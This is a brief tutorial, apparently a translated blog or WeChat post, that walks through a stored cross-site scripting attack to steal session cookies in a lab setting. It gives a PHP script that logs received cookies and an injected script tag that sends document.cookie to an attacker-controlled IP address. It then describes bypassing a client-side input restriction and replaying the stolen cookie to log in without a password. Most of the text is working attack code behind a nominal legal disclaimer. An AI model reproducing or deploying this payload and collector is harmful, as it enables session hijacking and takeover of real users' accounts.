Statement: For communication use only, illegal crimes are strictly prohibited, otherwise you will be responsible for the consequences
1. Prepare the environment for receiving cookies:
ip is 172.24.10.105
The code is: save as getCookie.php
<?php $cookie = $_GET['cookie']; $log = fopen("cookie.txt", "w"); fwrite($log, $cookie ."\n"); fclose($log); echo "Attack successful"; ?>
2. Insert js code in the experimental environment:
<script>document.location='http://172.24.10.105/getCookie.php?cookie='+document.cookie;</script>
Remove the restriction by inspecting the element, then insert the js code
Then revisit this page and find that a jump has been made
and saw the cookie on the platform that received the cookie
Change the browser to set cookies
direct interview:
Successful login without password
Welcome to the WeChat public account